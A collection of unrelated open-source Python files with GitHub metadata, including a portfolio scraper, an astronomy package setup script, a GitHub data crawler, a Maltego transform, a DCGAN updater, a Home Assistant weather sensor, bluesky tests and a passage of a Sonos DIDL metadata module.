open("valueresearch_portfolio.json","w").write(json.dumps(vr))
vr = cleanup_data(vr)
if DEBUG:
open("valueresearch_portfolio_clean.json","w").write(json.dumps(vr))
return(vr)
if __name__ == "__main__":
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
orders = get_portfolio(os.environ['VR_username'],os.environ['VR_passwd'],"Chrome",dir_path+os.path.sep+r"chromedriver\chromedriver.exe")
# vr = cleanup_data()
# open("valueresearch_portfolio_clean.json","w").write(json.dumps(vr))
|
{
"content_hash": "f0980cf7af2fbfe0aed482bcf8ac80a7",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 147,
"avg_line_length": 35.384313725490195,
"alnum_prop": 0.5865011636927852,
"repo_name": "pradyumnac/valueresearch",
"id": "1e7370adf560d8dff433bab489873d80e577a256",
"size": "9023",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "58"
},
{
"name": "Python",
"bytes": "16236"
}
],
"symlink_target": ""
}
|
"""This file is for distribute properimage
"""
# =============================================================================
# IMPORTS
# =============================================================================
import sys
import os
import setuptools
from ez_setup import use_setuptools
use_setuptools()
# =============================================================================
# PATH TO THIS MODULE
# =============================================================================
PATH = os.path.abspath(os.path.dirname(__file__))
# =============================================================================
# Get the version from properimage file itself (not imported)
# =============================================================================
PROPERIMAGE_INIT_PATH = os.path.join(PATH, "properimage", "__init__.py")
with open(PROPERIMAGE_INIT_PATH, "r") as f:
for line in f:
if line.startswith("__version__"):
_, _, PI_VERSION = line.replace('"', "").split()
break
# =============================================================================
# CONSTANTS
# =============================================================================
REQUIREMENTS = [
"numpy >= 1.13.2",
"scipy >= 1.0",
"astropy >= 2.0",
"matplotlib",
"sep",
"astroscrappy>=1.0.5",
"astroalign>=1.0.3",
"tinynpydb>=0.1",
"pyFFTW>=0.12",
# "pytest>=3.6.2",
]
# =============================================================================
# DESCRIPTION
# =============================================================================
with open("README.md") as fp:
LONG_DESCRIPTION = fp.read()
# =============================================================================
# FUNCTIONS
# =============================================================================
print(setuptools.find_packages()) # exclude=['test*']
def do_setup():
setuptools.setup(
name="properimage",
version=PI_VERSION,
description="Proper Astronomic Image Analysis",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
author="Bruno Sanchez",
author_email="bruno@oac.unc.edu.ar",
url="https://github.com/toros-astro/ProperImage",
py_modules=["ez_setup"],
license="BSD 3",
keywords="astronomy image",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Scientific/Engineering",
],
packages=setuptools.find_packages(), # exclude=['test*']),
install_requires=REQUIREMENTS,
)
def do_publish():
pass
if __name__ == "__main__":
if sys.argv[-1] == "publish":
do_publish()
else:
do_setup()
|
{
"content_hash": "2387e6105049b19684d14ba4eb701bf6",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 79,
"avg_line_length": 31.39047619047619,
"alnum_prop": 0.4098907766990291,
"repo_name": "toros-astro/ProperImage",
"id": "660fdbaf2d9c33a0fc7d067dba47b0064cf645c6",
"size": "3512",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "207836"
}
],
"symlink_target": ""
}
|
import requests
import json
import time
import os
import urllib2
import random
from sqlalchemy import create_engine
from sqlalchemy import MetaData, Column, Table, ForeignKey
from sqlalchemy import Integer, String, DateTime
from sqlalchemy import func
from sqlalchemy.orm import sessionmaker
from config import *
engine = create_engine('mysql://'+db_username+'@'+db_host+':'+str(db_port)+'/'+db_database, echo=False)
metadata = MetaData(bind=engine)
Session = sessionmaker(bind=engine)
db_session = Session()
repository_table = Table('repository', metadata,
Column('id', Integer, primary_key=True),
Column('name', String(60)),
Column('forks', Integer),
Column('open_issues', Integer),
Column('watchers', Integer),
mysql_engine='InnoDB',
)
issue_table = Table('issue', metadata,
Column('id', Integer, autoincrement=True, primary_key=True),
Column('repository_id', Integer, ForeignKey('repository.id')),
Column('creator', String(60)),
Column('number', Integer),
Column('open_date', DateTime),
Column('close_date', DateTime),
mysql_engine='InnoDB',
)
commit_table = Table('commit', metadata,
Column('id', Integer, autoincrement=True, primary_key=True),
Column('repository_id', Integer, ForeignKey('repository.id')),
Column('committer', String(60)),
mysql_engine='InnoDB'
)
# create tables in database
metadata.create_all()
session = requests.Session()
session.auth = (github_username, github_password)
# Get some random words (from https://gist.github.com/duncannz/4669395)
response = urllib2.urlopen('https://gist.github.com/duncannz/4669395/raw/3f9b27fe0e33326e0cedca7472a9d55855a747bc/words.txt')
random_words = response.readlines()
def _get_user_organizations(user):
response = session.get('https://api.github.com/users/'+user+"/orgs")
_check_quota(response)
if(response.ok):
orgs = json.loads(response.text or response.content)
return [org['login'] for org in orgs]
# pick a radom repository by searching with a random keyword
def _get_random_repo():
while True:
keyword = random.choice(random_words)
response = session.get('https://api.github.com/legacy/repos/search/'+keyword)
_check_quota(response)
if(response.ok):
repos = json.loads(response.text or response.content)
if(len(repos['repositories']) > 0):
repo = random.choice(repos['repositories'])
userame = repo['username']
orgs = _get_user_organizations(userame)
for org in orgs:
response = session.get('https://api.github.com/users/'+org+'/repos')
_check_quota(response)
if(response.ok):
repos = json.loads(response.text or response.content)
return random.choice(repos)
def _check_quota(response):
requests_left = int(response.headers['X-RateLimit-Remaining'])
if(requests_left == 0):
print "Sleeping for 65 minutes... Good Night."
time.sleep(65 * 60)
if requests_left % 10 == 0: print "Requests Left: " + str(requests_left)
# crawl around and gather data until the target sample size is reached
def crawl(sample_size):
while(sample_size > db_session.query(repository_table).count()):
try:
repo = _get_random_repo();
i = repository_table.insert([repo])
i.execute()
url = 'https://api.github.com/repos/'+repo['full_name']+'/commits?per_page=100'
while url is not None:
response = session.get(url)
_check_quota(response)
if(response.ok):
commits = json.loads(response.text or response.content)
for commit in commits:
committer = None
if 'author' in commit and commit['author'] is not None:
committer = commit['author']['login']
else:
committer = commit['commit']['author']['name'].encode('unicode_escape')
i = commit_table.insert(
dict(
repository_id=repo['id'],
committer=committer))
i.execute()
links = response.links
if 'next' in links:
url = response.links["next"]['url']
else:
url = None
else:
url = None
for tag in ['closed', 'open']:
url = 'https://api.github.com/repos/'+repo['full_name']+'/issues?per_page=100&state='+tag
while url is not None:
response = session.get(url)
_check_quota(response)
if(response.ok):
issues = json.loads(response.text or response.content)
for issue in issues:
i = issue_table.insert(
dict(
number=issue['number'],
repository_id=repo['id'],
creator=issue['user']['login'],
open_date=issue['created_at'],
close_date=issue['closed_at']))
i.execute()
links = response.links
if 'next' in links:
url = response.links["next"]['url']
else:
url = None
else:
url = None
sample_size -= 1
except Exception as e:
print e
crawl(5000)
|
{
"content_hash": "9c0fb924856c90cd00daf47009b7dc34",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 125,
"avg_line_length": 33.248366013071895,
"alnum_prop": 0.6264989188126597,
"repo_name": "kevinpeterson/github-process-research",
"id": "02f86bfdf4778e5c202f34c278f8ee90b44d078c",
"size": "5354",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/research.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "12801"
},
{
"name": "Shell",
"bytes": "230"
},
{
"name": "TeX",
"bytes": "49898"
}
],
"symlink_target": ""
}
|
import Tkinter, tkFileDialog
import json
import csv
from canari.maltego.utils import debug, progress
from canari.framework import configure #, superuser
from common.entities import RFCSV, RFEvent
from common.APIUtil import APIUtil
__author__ = 'Filip Reesalu'
__copyright__ = 'Copyright 2014, Recorded Future'
__credits__ = []
__license__ = 'Apache'
__version__ = '1.0'
__maintainer__ = 'Christian Heinrich'
__email__ = 'christian.heinrich@cmlh.id.au'
__status__ = 'Production'
__all__ = [
'dotransform',
'onterminate'
]
@configure(
label='Import CSV File [Recorded Future]',
description='http://support.recordedfuture.com/knowledgebase/articles/164320-csv-export-explained',
uuids=[ 'recfut.RFImportCSV' ],
inputs=[ ( 'Recorded Future', RFCSV ) ],
debug=False
)
def dotransform(request, response):
# Report transform progress
progress(50)
# Send a debugging message to the Maltego UI console
debug('Maltego Input Entity Value: %s' % request.value)
name = request.value
debug('name: %s' % name)
root = Tkinter.Tk()
root.lift()
root.withdraw()
# TODO Raise exception if no CSV file is selected
csvfilename = tkFileDialog.askopenfilename()
data = csv.DictReader(open(csvfilename), delimiter=',',fieldnames=('Event Id','Event Type','Event Title','Start Time','End Time','Precision','Count','First Published Time','Last Published Time','Sample Fragment','Entities','Locations','Source Count','Positive Sentiment','Negative Sentiment'))
next(data)
for row in data:
event = row['Event Type']+"-"+row['Event Id']
e = RFEvent('%s' % event)
e.eid = row['Event Id']
e.etype = row['Event Type']
e.title = row['Event Title']
e.starttime = row['Start Time']
e.stoptime = row['End Time']
e.fragment = row['Sample Fragment']
e.precision = row['Precision']
e.count = row['Count']
e.firstpublished = row['First Published Time']
e.lastpublished = row['Last Published Time']
e.sourcecount = row['Source Count']
e.possentiment = row['Positive Sentiment']
e.negsentiment = row['Negative Sentiment']
# Add entity to response object
response += e
# Update progress
progress(100)
# Return response for visualization
return response
def onterminate():
debug('Caught signal... exiting.')
exit(0)
|
{
"content_hash": "a9dd933c892f97c02cf760f0aadd9e1d",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 297,
"avg_line_length": 29.951219512195124,
"alnum_prop": 0.6445439739413681,
"repo_name": "cmlh/Maltego-Recorded_Future",
"id": "cc4fd2c5486b135ebc54a5ac5a9e453a6a3be4a1",
"size": "2479",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "debian-dpkg/maltego-recordedfuture-1.1rc1/opt/maltego-recordedfuture/bin/canari/recordedfuturecanari/src/recordedfuturecanari/transforms/rf_csv_maltegoload.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "1201"
},
{
"name": "Python",
"bytes": "46218"
},
{
"name": "Shell",
"bytes": "599"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import chainer
import chainer.functions as F
from chainer import Variable
class DCGANUpdater(chainer.training.StandardUpdater):
def __init__(self, *args, **kwargs):
self.gen, self.dis = kwargs.pop('models')
super(DCGANUpdater, self).__init__(*args, **kwargs)
def loss_dis(self, dis, y_fake, y_real):
batchsize = len(y_fake)
L1 = F.sum(F.softplus(-y_real)) / batchsize
L2 = F.sum(F.softplus(y_fake)) / batchsize
loss = L1 + L2
chainer.report({'loss': loss}, dis)
return loss
def loss_gen(self, gen, y_fake):
batchsize = len(y_fake)
loss = F.sum(F.softplus(-y_fake)) / batchsize
chainer.report({'loss': loss}, gen)
return loss
def update_core(self):
gen_optimizer = self.get_optimizer('gen')
dis_optimizer = self.get_optimizer('dis')
batch = self.get_iterator('main').next()
x_real = Variable(self.converter(batch, self.device)) / 255.
xp = chainer.cuda.get_array_module(x_real.data)
gen, dis = self.gen, self.dis
batchsize = len(batch)
y_real = dis(x_real)
z = Variable(xp.asarray(gen.make_hidden(batchsize)))
x_fake = gen(z)
y_fake = dis(x_fake)
dis_optimizer.update(self.loss_dis, dis, y_fake, y_real)
gen_optimizer.update(self.loss_gen, gen, y_fake)
|
{
"content_hash": "fd123c184ad5ed0356b8f7f4180d8f68",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 68,
"avg_line_length": 30.82608695652174,
"alnum_prop": 0.5994358251057827,
"repo_name": "ysekky/chainer",
"id": "b9fda48ab2fb36fb02875dafb92a96de14e3e92d",
"size": "1441",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "examples/dcgan/updater.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "2598837"
}
],
"symlink_target": ""
}
|
"""Weather information for air and road temperature (by Trafikverket)."""
import asyncio
from datetime import timedelta
import logging
import aiohttp
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, CONF_API_KEY, CONF_MONITORED_CONDITIONS,
CONF_NAME, DEVICE_CLASS_HUMIDITY, DEVICE_CLASS_TEMPERATURE, TEMP_CELSIUS)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by Trafikverket"
ATTR_MEASURE_TIME = 'measure_time'
ATTR_ACTIVE = 'active'
CONF_STATION = 'station'
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=10)
SCAN_INTERVAL = timedelta(seconds=300)
SENSOR_TYPES = {
'air_temp': [
'Air temperature', TEMP_CELSIUS,
'air_temp', 'mdi:thermometer', DEVICE_CLASS_TEMPERATURE],
'road_temp': [
'Road temperature', TEMP_CELSIUS,
'road_temp', 'mdi:thermometer', DEVICE_CLASS_TEMPERATURE],
'precipitation': [
'Precipitation type', None,
'precipitationtype', 'mdi:weather-snowy-rainy', None],
'wind_direction': [
'Wind direction', '°',
'winddirection', 'mdi:flag-triangle', None],
'wind_direction_text': [
'Wind direction text', None,
'winddirectiontext', 'mdi:flag-triangle', None],
'wind_speed': [
'Wind speed', 'm/s',
'windforce', 'mdi:weather-windy', None],
'humidity': [
'Humidity', '%',
'humidity', 'mdi:water-percent', DEVICE_CLASS_HUMIDITY],
'precipitation_amount': [
'Precipitation amount', 'mm',
'precipitation_amount', 'mdi:cup-water', None],
'precipitation_amountname': [
'Precipitation name', None,
'precipitation_amountname', 'mdi:weather-pouring', None],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_STATION): cv.string,
vol.Required(CONF_MONITORED_CONDITIONS, default=[]):
[vol.In(SENSOR_TYPES)],
})
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the Trafikverket sensor platform."""
from pytrafikverket.trafikverket_weather import TrafikverketWeather
sensor_name = config[CONF_NAME]
sensor_api = config[CONF_API_KEY]
sensor_station = config[CONF_STATION]
web_session = async_get_clientsession(hass)
weather_api = TrafikverketWeather(web_session, sensor_api)
dev = []
for condition in config[CONF_MONITORED_CONDITIONS]:
dev.append(TrafikverketWeatherStation(
weather_api, sensor_name, condition, sensor_station))
if dev:
async_add_entities(dev, True)
class TrafikverketWeatherStation(Entity):
"""Representation of a Trafikverket sensor."""
def __init__(self, weather_api, name, sensor_type, sensor_station):
"""Initialize the sensor."""
self._client = name
self._name = SENSOR_TYPES[sensor_type][0]
self._type = sensor_type
self._state = None
self._unit = SENSOR_TYPES[sensor_type][1]
self._station = sensor_station
self._weather_api = weather_api
self._icon = SENSOR_TYPES[sensor_type][3]
self._device_class = SENSOR_TYPES[sensor_type][4]
self._weather = None
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self._client, self._name)
@property
def icon(self):
"""Icon to use in the frontend."""
return self._icon
@property
def device_state_attributes(self):
"""Return the state attributes of Trafikverket Weatherstation."""
return {
ATTR_ATTRIBUTION: ATTRIBUTION,
ATTR_ACTIVE: self._weather.active,
ATTR_MEASURE_TIME: self._weather.measure_time,
}
@property
def device_class(self):
"""Return the device class of the sensor."""
return self._device_class
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self):
"""Get the latest data from Trafikverket and updates the states."""
try:
self._weather = await self._weather_api.async_get_weather(
self._station)
self._state = getattr(
self._weather,
SENSOR_TYPES[self._type][2])
except (asyncio.TimeoutError,
aiohttp.ClientError, ValueError) as error:
_LOGGER.error("Could not fetch weather data: %s", error)
|
{
"content_hash": "a873c81c75b5e0077b0714d3b102f34d",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 77,
"avg_line_length": 32.71895424836601,
"alnum_prop": 0.6450259688373952,
"repo_name": "jabesq/home-assistant",
"id": "c846d020c848775fd6c20dc9c5bb89bfca32c71a",
"size": "5007",
"binary": false,
"copies": "7",
"ref": "refs/heads/dev",
"path": "homeassistant/components/trafikverket_weatherstation/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1829"
},
{
"name": "Python",
"bytes": "16238292"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17615"
}
],
"symlink_target": ""
}
|
import ast
import pytest
import jsonschema
import time as ttime
from datetime import datetime
from bluesky.plans import scan, grid_scan
import bluesky.preprocessors as bpp
import bluesky.plan_stubs as bps
from bluesky.preprocessors import SupplementalData
from bluesky.callbacks.best_effort import BestEffortCallback
from bluesky.utils import new_uid
from event_model import RunRouter
def test_hints(RE, hw):
motor = hw.motor
expected_hint = {'fields': [motor.name]}
assert motor.hints == expected_hint
collector = []
def collect(*args):
collector.append(args)
RE(scan([], motor, 1, 2, 2), {'descriptor': collect})
name, doc = collector.pop()
assert doc['hints'][motor.name] == expected_hint
def test_simple(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
RE(scan([hw.ab_det], hw.motor, 1, 5, 5))
def test_disable(RE, hw):
det, motor = hw.ab_det, hw.motor
bec = BestEffortCallback()
RE.subscribe(bec)
bec.disable_table()
RE(scan([det], motor, 1, 5, 5))
assert bec._table is None
bec.enable_table()
RE(scan([det], motor, 1, 5, 5))
assert bec._table is not None
bec.peaks.com
bec.peaks['com']
assert ast.literal_eval(repr(bec.peaks)) == vars(bec.peaks)
bec.clear()
assert bec._table is None
# smoke test
bec.disable_plots()
bec.enable_plots()
bec.disable_baseline()
bec.enable_baseline()
bec.disable_heading()
bec.enable_heading()
def test_blank_hints(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
RE(scan([hw.ab_det], hw.motor, 1, 5, 5, md={'hints': {}}))
def test_with_baseline(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
sd = SupplementalData(baseline=[hw.det])
RE.preprocessors.append(sd)
RE(scan([hw.ab_det], hw.motor, 1, 5, 5))
def test_underhinted_plan(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
@bpp.run_decorator()
def broken_plan(dets):
yield from bps.trigger_and_read(dets)
RE(broken_plan([hw.det]))
def test_live_grid(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
RE(grid_scan([hw.det4], hw.motor1, 0, 1, 1, hw.motor2, 0, 1, 2, True))
def test_push_start_document(capsys):
""" Pass the start document to BEC and verify if the scan information is printed correctly"""
bec = BestEffortCallback()
uid = new_uid()
time = ttime.time()
scan_id = 113435 # Just some arbitrary number
# Include minimum information needed to print the header
bec("start", {"scan_id": scan_id, "time": time, "uid": uid})
captured = capsys.readouterr()
assert f"Transient Scan ID: {scan_id}" in captured.out, \
"BestEffortCallback: Scan ID is not printed correctly"
tt = datetime.fromtimestamp(time).utctimetuple()
assert f"Time: {ttime.strftime('%Y-%m-%d %H:%M:%S', tt)}" in captured.out, \
"BestEffortCallback: Scan time is not printed correctly"
assert f"Persistent Unique Scan ID: '{uid}'" in captured.out, \
"BestEffortCallback: Scan UID is not printed correctly"
def test_multirun_nested_plan(capsys, caplog, RE, hw):
# This test only checks if the plan runs without crashing. If BEC crashes,
# the plan will still run, but data will not be displayed.
@bpp.set_run_key_decorator(run="inner_run")
def plan_inner():
yield from grid_scan([hw.det4], hw.motor1, 0, 1, 1, hw.motor2, 0, 1, 2, True)
def sequence():
for n in range(5):
yield from bps.mov(hw.motor, n * 0.1 + 1)
yield from bps.trigger_and_read([hw.det1])
@bpp.set_run_key_decorator(run="outer_run")
@bpp.stage_decorator([hw.det1, hw.motor])
@bpp.run_decorator(md={})
def plan_outer():
yield from sequence()
# Call inner plan from within the plan
yield from plan_inner()
# Run another set of commands
yield from sequence()
# The first test should fail. We check if expected error message is printed in case
# of failure.
bec = BestEffortCallback()
bec_token = RE.subscribe(bec)
RE(plan_outer())
captured = capsys.readouterr()
# Check for the number of runs (the number of times UID is printed in the output)
scan_uid_substr = "Persistent Unique Scan ID"
n_runs = captured.out.count(scan_uid_substr)
assert n_runs == 2, "scan output contains incorrect number of runs"
# Check if the expected error message is printed once the callback fails. The same
# substring will be used in the second part of the test to check if BEC did not fail.
err_msg_substr = "is being suppressed to not interrupt plan execution"
assert err_msg_substr in str(caplog.text), \
"Best Effort Callback failed, but expected error message was not printed"
RE.unsubscribe(bec_token)
caplog.clear()
# The second test should succeed, i.e. the error message should not be printed
def factory(name, doc):
bec = BestEffortCallback()
return [bec], []
rr = RunRouter([factory])
RE.subscribe(rr)
RE(plan_outer())
captured = capsys.readouterr()
n_runs = captured.out.count(scan_uid_substr)
assert n_runs == 2, "scan output contains incorrect number of runs"
assert err_msg_substr not in caplog.text, \
"Best Effort Callback failed while executing nested plans"
@pytest.mark.xfail(not (jsonschema.__version__.split('.') < ['3', ]),
reason='Deprecations in jsonschema')
def test_plot_ints(RE):
from ophyd import Signal
from bluesky.callbacks.best_effort import BestEffortCallback
from bluesky.plans import count
import bluesky.plan_stubs as bps
bec = BestEffortCallback()
RE.subscribe(bec)
s = Signal(name='s')
RE(bps.mov(s, int(0)))
assert s.describe()['s']['dtype'] == 'integer'
s.kind = 'hinted'
with pytest.warns(None) as record:
RE(count([s], num=35))
assert len(record) == 0
def test_plot_prune_fifo(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
num_pruned = 2
# create the LivePlot
RE(bps.repeater(num_pruned, scan, [hw.ab_det], hw.motor, 1, 5, 5))
# test it
assert len(bec._live_plots) == 1
# get the reference key for our LivePlot dict
uuid = next(iter(bec._live_plots))
assert len(bec._live_plots[uuid]) == 1
# get reference key for our detector
det_name = next(iter(bec._live_plots[uuid]))
# should be same as hw.ab_det.a.name (`.a` comes from .read_attrs[0]), prove it now
assert det_name == hw.ab_det.a.name
# get the LivePlot object
lp = bec._live_plots[uuid][det_name]
assert lp is not None
assert len(lp.ax.lines) == num_pruned
# prune the LivePlot (has no effect since we have exact number to keep)
bec.plot_prune_fifo(num_pruned, hw.motor, hw.ab_det.a)
assert len(lp.ax.lines) == num_pruned
# add more lines to the LivePlot
RE(bps.repeater(num_pruned, scan, [hw.ab_det], hw.motor, 1, 5, 5))
# get the LivePlot object, again, in case the UUID was changed
assert len(bec._live_plots) == 1
uuid = next(iter(bec._live_plots))
lp = bec._live_plots[uuid][det_name]
assert lp is not None
assert len(lp.ax.lines) == num_pruned * 2
# prune again, this time reduces number of lines
bec.plot_prune_fifo(num_pruned, hw.motor, hw.ab_det.a)
assert len(lp.ax.lines) == num_pruned
|
{
"content_hash": "eab5ccfda90f3990026c6d1428c472b6",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 97,
"avg_line_length": 30.71900826446281,
"alnum_prop": 0.6524078557976863,
"repo_name": "ericdill/bluesky",
"id": "09870872ddc6b0d65e14d2787149b58224822a87",
"size": "7434",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bluesky/tests/test_bec.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "331516"
},
{
"name": "Shell",
"bytes": "104"
}
],
"symlink_target": ""
}
|
""" This module contains classes for handling DIDL-Lite metadata.
This is the XML schema used by Sonos for carrying metadata representing many
items such as tracks, playlists, composers, albums etc.
"""
# It tries to follow the class hierarchy provided by the DIDL-Lite schema
# described in the UPnP Spec, especially that for the ContentDirectory Service
# Although Sonos uses ContentDirectory v1, the document for v2 is more helpful:
# http://upnp.org/specs/av/UPnP-av-ContentDirectory-v2-Service.pdf
from __future__ import unicode_literals
import sys
import warnings
warnings.simplefilter('always', DeprecationWarning)
import textwrap
from .xml import XML, ns_tag
from .exceptions import DIDLMetadataError
from .utils import really_unicode
###############################################################################
# MISC HELPER FUNCTIONS #
###############################################################################
def to_didl_string(*args):
""" Convert any number of DIDLObjects to a unicode xml string.
Args:
*args (DidlObject): One or more DidlObject (or subclass) instances
Returns:
str: A unicode string of the form <DIDL-Lite ...>...</DIDL-Lite>
representing the instances
"""
didl = XML.Element(
'DIDL-Lite',
{
'xmlns': "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/",
'xmlns:dc': "http://purl.org/dc/elements/1.1/",
'xmlns:upnp': "urn:schemas-upnp-org:metadata-1-0/upnp/",
})
for arg in args:
didl.append(arg.to_element())
if sys.version_info[0] == 2:
return XML.tostring(didl)
else:
return XML.tostring(didl, encoding='unicode')
def from_didl_string(string):
""" Convert a unicode xml string to a list of DIDLObjects.
Arg:
string (str): A unicode string containing an xml representation of one
or more DIDL-Lite items (in the form <DIDL-Lite ...>
...</DIDL-Lite> )
Returns:
list: A list of one or more instances of DIDLObject or a subclass
"""
items = []
root = XML.fromstring(string.encode('utf-8'))
for elt in root:
if elt.tag.endswith('item') or elt.tag.endswith('container'):
item_class = elt.findtext(ns_tag('upnp', 'class'))
try:
cls = _DIDL_CLASS_TO_CLASS[item_class]
except KeyError:
raise DIDLMetadataError("Unknown UPnP class: %s" % item_class)
items.append(cls.from_element(elt))
else:
# <desc> elements are allowed as an immediate child of <DIDL-Lite>
# according to the spec, but I have not seen one there in Sonos, so
# we treat them as illegal. May need to fix this if this
# causes problems.
raise DIDLMetadataError("Illegal child of DIDL element: <%s>"
% elt.tag)
return items
###############################################################################
# DIDL RESOURCE #
###############################################################################
class DidlResource(object):
""" Identifies a resource, typically some type of a binary asset, such as
a song.
A 'res' element contains a uri that identifies the resource.
"""
# Adapted from a class taken from the Python Brisa project - MIT licence.
# pylint: disable=too-many-instance-attributes
def __init__(self, uri, protocol_info, import_uri=None, size=None,
duration=None, bitrate=None, sample_frequency=None,
bits_per_sample=None, nr_audio_channels=None, resolution=None,
color_depth=None, protection=None):
""" Constructor for the Resource class.
Args:
uri (str): value of the res tag, typically a URI. It MUST be
properly escaped URIs as described in RFC 239
protocol_info (str): A string in the form a:b:c:d that
identifies the streaming or transport protocol for
transmitting the resource. A value is required. For more
information see section 2.5.2 at
http://upnp.org/specs/av/UPnP-av-ConnectionManager-v1-Service.pdf
import_uri (str, optional): uri locator for resource update
size (int, optional): size in bytes
duration (str, optional): duration of the playback of the res
at normal speed (H*:MM:SS:F* or H*:MM:SS:F0/F1)
bitrate (int, optional): bitrate in bytes/second
sample_frequency (int, optional): sample frequency in Hz
bits_per_sample (int, optional): bits per sample
nr_audio_channels (int, optional): number of audio channels
resolution (str, optional): resolution of the resource (X*Y)
color_depth (int, optional): color depth in bits
protection (str, optional): statement of protection type
"""
# Of these attributes, only uri, protocol_info and duration have been
# spotted 'in the wild'
self.uri = uri
# Protocol info is in the form a:b:c:d - see
# sec 2.5.2 at
# http://upnp.org/specs/av/UPnP-av-ConnectionManager-v1-Service.pdf
self.protocol_info = protocol_info
self.import_uri = import_uri
self.size = size
self.duration = duration
self.bitrate = bitrate
self.sample_frequency = sample_frequency
self.bits_per_sample = bits_per_sample
self.nr_audio_channels = nr_audio_channels
self.resolution = resolution
self.color_depth = color_depth
self.protection = protection
@classmethod
def from_element(cls, element):
""" Set the resource properties from a <res> element.
Arg:
element (Element): An ElementTree Element
"""
def _int_helper(name):
"""Try to convert the name attribute to an int, or None."""
result = element.get(name)
if result is not None:
try:
return int(result)
except ValueError:
raise ValueError(
'Could not convert {0} to an integer'.format(name))
else:
return None
content = {}
# required
content['protocol_info'] = element.get('protocolInfo')
if content['protocol_info'] is None:
raise Exception('Could not create Resource from Element: '
'protocolInfo not found (required).')
# Optional
content['import_uri'] = element.get('importUri')
content['size'] = _int_helper('size')
content['duration'] = element.get('duration')
content['bitrate'] = _int_helper('bitrate')
content['sample_frequency'] = _int_helper('sampleFrequency')
content['bits_per_sample'] = _int_helper('bitsPerSample')
content['nr_audio_channels'] = _int_helper('nrAudioChannels')
content['resolution'] = element.get('resolution')
content['color_depth'] = _int_helper('colorDepth')
content['protection'] = element.get('protection')
content['uri'] = element.text
return cls(**content)
def __repr__(self):
return '<{0} \'{1}\' at {2}>'.format(self.__class__.__name__,
self.uri,
hex(id(self)))
def __str__(self):
return self.__repr__()
def to_element(self):
""" Return an ElementTree Element based on this resource."""
if not self.protocol_info:
raise Exception('Could not create Element for this resource: '
'protocolInfo not set (required).')
root = XML.Element('res')
# Required
root.attrib['protocolInfo'] = self.protocol_info
# Optional
if self.import_uri is not None:
root.attrib['importUri'] = self.import_uri
if self.size is not None:
root.attrib['size'] = str(self.size)
if self.duration is not None:
root.attrib['duration'] = self.duration
if self.bitrate is not None:
root.attrib['bitrate'] = str(self.bitrate)
if self.sample_frequency is not None:
root.attrib['sampleFrequency'] = str(self.sample_frequency)
if self.bits_per_sample is not None:
root.attrib['bitsPerSample'] = str(self.bits_per_sample)
if self.nr_audio_channels is not None:
root.attrib['nrAudioChannels'] = str(self.nr_audio_channels)
if self.resolution is not None:
root.attrib['resolution'] = self.resolution
if self.color_depth is not None:
root.attrib['colorDepth'] = str(self.color_depth)
if self.protection is not None:
root.attrib['protection'] = self.protection
root.text = self.uri
return root
###############################################################################
# BASE OBJECTS #
###############################################################################
# a mapping which will be used to look up the relevant class from the
# DIDL item class
_DIDL_CLASS_TO_CLASS = {}
class DidlMetaClass(type):
"""Meta class for all Didl objects."""
